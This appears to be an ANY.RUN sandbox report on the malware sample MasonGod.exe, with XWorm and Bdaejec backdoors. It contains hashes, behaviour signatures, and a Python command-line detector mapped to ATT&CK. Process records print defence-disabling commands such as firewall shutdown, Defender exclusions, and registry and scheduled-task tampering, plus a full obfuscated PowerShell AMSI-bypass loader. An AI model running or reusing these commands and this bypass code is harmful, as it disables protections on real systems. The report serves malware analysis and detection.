File name: MasonGod.exe

Full analysis: https://app.any.run/tasks/52814ff2-7d6e-4086-acbc-e1dc0f95719c
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. In this task the backdoor families detected are Bdaejec (iyMbXS.exe, PID 6632) and XWorm (x69s.exe, PID 6760); see the Tags and Threats sections below.

Analysis date: May 26, 2025, 01:14:45
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-reg
auto-sch
bdaejec
backdoor
auto-startup
remote
xworm
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5: DA5E3B74FFF72F0E14F29E5B5007AD59
SHA1: AA89BE5706E274878D0304F931B36F605E7A7B19
SHA256: F258E1FAA4CBB6C3976D2E99E55F9A97DA51D197F9FD9BA58553C2DD2541999E
SSDEEP: 12288:YFMspv4RMSrzum+3KLX2+E6esjaZueABFLC+:3spviMuzn+3n+E2jkuBFL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Known privilege escalation attack

      • dllhost.exe (PID: 5244)
    • Adds path to the Windows Defender exclusion list

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
    • Changes powershell execution policy (Bypass)

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
    • Changes Windows Defender settings

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • cmd.exe (PID: 4120)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4400)
      • powershell.exe (PID: 6752)
      • powershell.exe (PID: 332)
      • powershell.exe (PID: 812)
      • powershell.exe (PID: 1240)
    • Adds process to the Windows Defender exclusion list

      • MasonGod.exe (PID: 6388)
    • Changes the autorun value in the registry

      • wlanext.exe (PID: 4068)
    • BDAEJEC has been detected

      • iyMbXS.exe (PID: 6632)
    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 5756)
    • Application was injected by another process

      • dllhost.exe (PID: 6972)
    • Runs injected code in another process

      • powershell.exe (PID: 340)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 340)
    • Changes settings for real-time protection

      • powershell.exe (PID: 4868)
    • Create files in the Startup directory

      • x69s.exe (PID: 6760)
    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 7276)
    • XWORM has been detected (SURICATA)

      • x69s.exe (PID: 6760)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 6268)
    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 7964)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 3024)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 8176)
  • SUSPICIOUS

    • Reads the date of Windows installation

      • MasonGod.exe (PID: 5376)
      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • MasonGod.exe (PID: 5376)
    • Reads security settings of Internet Explorer

      • MasonGod.exe (PID: 5376)
      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • iyMbXS.exe (PID: 6632)
      • x69..exe (PID: 7156)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 5956)
      • mshta.exe (PID: 1852)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 5956)
      • MasonGod.exe (PID: 6388)
      • x69..exe (PID: 7156)
    • The executable file from the user directory is run by the CMD process

      • MasonGod.exe (PID: 6388)
    • Uses TASKKILL.EXE to kill process

      • mshta.exe (PID: 1852)
    • Executes as Windows Service

      • VSSVC.exe (PID: 5640)
    • Starts POWERSHELL.EXE for commands execution

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • cmd.exe (PID: 4120)
    • Script adds exclusion path to Windows Defender

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
    • Script adds exclusion process to Windows Defender

      • MasonGod.exe (PID: 6388)
    • The process executes via Task Scheduler

      • wlanext.exe (PID: 4068)
      • powershell.exe (PID: 340)
    • Executing commands from a ".bat" file

      • MasonGod.exe (PID: 6388)
      • x69..exe (PID: 7156)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 4220)
    • Executable content was dropped or overwritten

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • x69Install.exe (PID: 4740)
    • Connects to unusual port

      • iyMbXS.exe (PID: 6632)
      • x69s.exe (PID: 6760)
    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 340)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 4120)
    • Script disables Windows Defender's behavior monitoring

      • cmd.exe (PID: 4120)
    • Contacting a server suspected of hosting an CnC

      • x69s.exe (PID: 6760)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 4120)
    • Uses REG/REGEDIT.EXE to modify registry

      • powershell.exe (PID: 7980)
      • powershell.exe (PID: 8064)
      • cmd.exe (PID: 4120)
    • Uses NETSH.EXE to change the status of the firewall

      • powershell.exe (PID: 208)
    • Modifies existing scheduled task

      • schtasks.exe (PID: 780)
      • schtasks.exe (PID: 7804)
      • schtasks.exe (PID: 4024)
      • schtasks.exe (PID: 6264)
      • schtasks.exe (PID: 7680)
  • INFO

    • Checks supported languages

      • MasonGod.exe (PID: 5376)
      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • iyMbXS.exe (PID: 6632)
      • x69Install.exe (PID: 4740)
      • x69..exe (PID: 7156)
      • MpCmdRun.exe (PID: 5756)
      • x69s.exe (PID: 6760)
      • x69s.exe (PID: 7824)
    • Reads the computer name

      • MasonGod.exe (PID: 5376)
      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • iyMbXS.exe (PID: 6632)
      • x69Install.exe (PID: 4740)
      • x69..exe (PID: 7156)
      • MpCmdRun.exe (PID: 5756)
      • x69s.exe (PID: 6760)
      • x69s.exe (PID: 7824)
    • Reads the machine GUID from the registry

      • MasonGod.exe (PID: 5376)
      • wlanext.exe (PID: 4068)
      • x69Install.exe (PID: 4740)
      • x69s.exe (PID: 6760)
      • x69s.exe (PID: 7824)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 5956)
      • mshta.exe (PID: 1852)
    • Disables trace logs

      • cmstp.exe (PID: 4400)
    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 4400)
    • Process checks computer location settings

      • MasonGod.exe (PID: 5376)
      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • x69..exe (PID: 7156)
    • Creates files in the program directory

      • dllhost.exe (PID: 5244)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4400)
      • powershell.exe (PID: 6752)
      • powershell.exe (PID: 332)
      • powershell.exe (PID: 812)
      • powershell.exe (PID: 1240)
      • powershell.exe (PID: 4868)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4400)
      • powershell.exe (PID: 6752)
      • powershell.exe (PID: 332)
      • powershell.exe (PID: 812)
      • powershell.exe (PID: 1240)
      • powershell.exe (PID: 4868)
    • Creates files or folders in the user directory

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • iyMbXS.exe (PID: 6632)
      • x69s.exe (PID: 6760)
    • Create files in a temporary directory

      • MasonGod.exe (PID: 6388)
      • x69Install.exe (PID: 4740)
      • iyMbXS.exe (PID: 6632)
      • x69..exe (PID: 7156)
      • MpCmdRun.exe (PID: 5756)
    • Auto-launch of the file from Registry key

      • wlanext.exe (PID: 4068)
    • Uses Task Scheduler to autorun other applications (AUTOMATE)

      • wlanext.exe (PID: 4068)
    • Checks proxy server information

      • iyMbXS.exe (PID: 6632)
    • Manual execution by a user

      • x69Install.exe (PID: 3784)
      • x69..exe (PID: 1388)
      • x69s.exe (PID: 7824)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 340)
    • Auto-launch of the file from Startup directory

      • x69s.exe (PID: 6760)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
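The Defender, firewall and scheduled-task tampering listed under MALICIOUS and SUSPICIOUS above shows up in the Process information section of this report as plain command lines (PIDs 208, 332, 780 and 900 are reproduced in the sample below). The following Python is an added example, not part of the ANY.RUN report, that classifies such command lines with regular expressions and maps each hit to the MITRE ATT&CK technique it corresponds to. The rule names, the technique mapping and the benign control line (PID 9999) are the example's own assumptions; the rules for Set-MpPreference -Disable* and MpCmdRun.exe -RemoveDefinitions cover behaviour the report names in its signatures ("Changes settings for real-time protection", "Resets Windows Defender malware definitions") without printing the command line, using those tools' documented switches.

```python
import re
from typing import Dict, List, Tuple

# Command lines copied from the Process information section of this report
# (PIDs 208, 332, 780, 900). PID 9999 is a constructed benign control line.
SAMPLE_CMDLINES: List[Tuple[int, str]] = [
    (208, 'powershell.exe -command "netsh advfirewall set allprofiles state off"'),
    (332, '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
          "-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "
          "'C:\\Users\\admin\\AppData\\Roaming\\x69Install.exe'"),
    (780, 'schtasks /Change /TN "Microsoft\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh" /Disable'),
    (900, 'reg add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet" '
          '/v "SpynetReporting" /t REG_DWORD /d "0" /f'),
    (9999, "powershell.exe -NoProfile -Command Get-MpComputerStatus"),
]

# (rule name, pattern, ATT&CK technique). Patterns tolerate the quoting and
# "reg" vs "reg.exe" variants seen in the report. Technique IDs:
# T1562.001 Impair Defenses: Disable or Modify Tools, T1562.004 Disable or
# Modify System Firewall, T1059.001 Command and Scripting Interpreter: PowerShell.
RULES = [
    ("defender_exclusion_added",
     re.compile(r'Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\b', re.I),
     "T1562.001"),
    ("defender_setting_disabled",          # assumed form, not printed in the report
     re.compile(r'Set-MpPreference\s+-Disable\w+', re.I),
     "T1562.001"),
    ("defender_policy_registry",
     re.compile(r'\breg(?:\.exe)?\s+add\s+"?HKLM\\Software\\Policies\\Microsoft\\Windows Defender', re.I),
     "T1562.001"),
    ("defender_definitions_removed",       # assumed form, not printed in the report
     re.compile(r'MpCmdRun(?:\.exe)?\s+-RemoveDefinitions', re.I),
     "T1562.001"),
    ("security_task_disabled",
     re.compile(r'schtasks(?:\.exe)?\s+/Change\s+/TN\s+"?Microsoft\\Windows\\'
                r'(?:ExploitGuard|Windows Defender)[^"]*"?\s+/Disable', re.I),
     "T1562.001"),
    ("firewall_disabled",
     re.compile(r'netsh\s+advfirewall\s+set\s+\w+\s+state\s+off', re.I),
     "T1562.004"),
    ("execution_policy_bypass",
     re.compile(r'-ExecutionPolicy\s+Bypass\b', re.I),
     "T1059.001"),
]


def classify(cmdline: str) -> List[str]:
    """Names of every rule that matches one command line, sorted for stable output."""
    return sorted(name for name, rx, _ in RULES if rx.search(cmdline))


def scan(records: List[Tuple[int, str]]) -> Dict[int, List[str]]:
    """PID -> matched rule names, keeping only records that matched at least one rule."""
    hits: Dict[int, List[str]] = {}
    for pid, cmdline in records:
        names = classify(cmdline)
        if names:
            hits[pid] = names
    return hits


def attack_techniques(records: List[Tuple[int, str]]) -> List[str]:
    """Distinct ATT&CK technique IDs implied by all matched rules, sorted."""
    techs = set()
    for _, cmdline in records:
        for _, rx, tech in RULES:
            if rx.search(cmdline):
                techs.add(tech)
    return sorted(techs)


if __name__ == "__main__":
    for pid, names in scan(SAMPLE_CMDLINES).items():
        print(f"PID {pid}: {', '.join(names)}")
    print("ATT&CK:", ", ".join(attack_techniques(SAMPLE_CMDLINES)))
```

Both Add-MpPreference instances in this task (PIDs 332 and 812) exited with code 1, so a rule of this kind should fire on the attempt rather than wait for evidence that the exclusion took effect; the same command lines fed through a SIEM's process-creation events (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled) give the same hits.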
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (56.7)
.exe | Win64 Executable (generic) (21.3)
.scr | Windows screen saver (10.1)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:26 00:06:26+00:00
ImageFileCharacteristics: Executable
PEType: PE32
LinkerVersion: 8
CodeSize: 446464
InitializedDataSize: 2048
UninitializedDataSize: -
EntryPoint: 0x6efd6
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.0.0.0
ProductVersionNumber: 1.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
FileDescription:
FileVersion: 1.0.0.0
InternalName: injection.exe
LegalCopyright:
OriginalFileName: injection.exe
ProductVersion: 1.0.0.0
AssemblyVersion: 1.0.0.0
All screenshots are available in the full report
Total processes: 231
Monitored processes: 100
Malicious processes: 9
Suspicious processes: 11

Behavior graph

(Interactive graph, available in the full report. Process nodes in the order they appear on the graph, conhost.exe hosts omitted: masongod.exe, cmstp.exe, CMSTPLUA, sppextcomobj.exe, slui.exe, mshta.exe, cmd.exe, masongod.exe, mshta.exe, taskkill.exe, SPPSurrogate, vssvc.exe, powershell.exe, powershell.exe, wlanext.exe, cmd.exe, timeout.exe, powershell.exe, schtasks.exe, x69install.exe, powershell.exe, iymbxs.exe, powershell.exe, x69install.exe, schtasks.exe, x69..exe, powershell.exe, cmd.exe, x69..exe, mpcmdrun.exe, schtasks.exe, x69s.exe (tagged #XWORM), powershell.exe, dllhost.exe, x69s.exe, svchost.exe, then a further run of powershell.exe, slui.exe, reg.exe, netsh.exe and schtasks.exe instances: in total roughly twenty powershell.exe, twenty-five reg.exe, six schtasks.exe and one netsh.exe nodes.)

Process information

Each entry gives PID, command line, image path and parent process, followed by the process details and the first modules loaded.

PID: 208
CMD: powershell.exe -command "netsh advfirewall set allprofiles state off"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 332
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\x69Install.exe'
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wlanext.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 340
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:EPFbuMUBkVtw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TcRgCfZxWkxzZI,[Parameter(Position=1)][Type]$klENkFJZuO)$kzWHiJIuIsm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+'c'+'t'+'e'+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+'a'+'t'+[Char](101)+''+'T'+''+[Char](121)+'p'+'e'+'','C'+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+'C'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+'la'+'s'+'s',[MulticastDelegate]);$kzWHiJIuIsm.DefineConstructor(''+'R'+''+'T'+'Sp'+'e'+''+'c'+'ia'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+'e'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g,'+'P'+''+'u'+''+[Char](98)+''+'l'+'ic',[Reflection.CallingConventions]::Standard,$TcRgCfZxWkxzZI).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$kzWHiJIuIsm.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+''+'k'+'e',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+'l'+'o'+'t'+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$klENkFJZuO,$TcRgCfZxWkxzZI).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+'e'+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $kzWHiJIuIsm.CreateType();}$FYcrjRkpoWGmb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+'m'+''+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+'W'+'i'+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+'et'+[Char](104)+''+[Char](111)+'ds');$LwCoCKVrrgsLwP=$FYcrjRkpoWGmb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'lic,'+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zCGeVfVGByoZXUnbszR=EPFbuMUBkVtw @([String])([IntPtr]);$GRFdfBOUoavgmiQoZpuARe=EPFbuMUBkVtw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SmdddBIYiFb=$FYcrjRkpoWGmb.GetMethod(''+'G'+''+'e'+''+'t'+''+'M'+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$pohxnefHKvhkqO=$LwCoCKVrrgsLwP.Invoke($Null,@([Object]$SmdddBIYiFb,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$xBlSXPaEcWfFclPOg=$LwCoCKVrrgsLwP.Invoke($Null,@([Object]$SmdddBIYiFb,[Object]('Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$VzMvrft=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pohxnefHKvhkqO,$zCGeVfVGByoZXUnbszR).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$QCVydxevpDTqiVxYl=$LwCoCKVrrgsLwP.Invoke($Null,@([Object]$VzMvrft,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+'a'+'n'+'B'+'u'+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$InCptbzBNz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xBlSXPaEcWfFclPOg,$GRFdfBOUoavgmiQoZpuARe).Invoke($QCVydxevpDTqiVxYl,[uint32]8,4,[ref]$InCptbzBNz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QCVydxevpDTqiVxYl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xBlSXPaEcWfFclPOg,$GRFdfBOUoavgmiQoZpuARe).Invoke($QCVydxevpDTqiVxYl,[uint32]8,0x20,[ref]$InCptbzBNz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+'9s'+'t'+''+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: svchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID: 352
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 780
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 780
CMD: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Path: C:\Windows\System32\schtasks.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 812
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\x69..exe'
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wlanext.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 900
CMD: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Path: C:\Windows\System32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
PID: 960
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 968
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 130 981
Read events: 130 888
Write events: 85
Delete events: 8

Modification events

PID 4400 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: EnableFileTracing | Value: 0
PID 4400 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: EnableAutoFileTracing | Value: 0
PID 4400 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: EnableConsoleTracing | Value: 0
PID 4400 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: FileTracingMask | Value: (empty in the export)
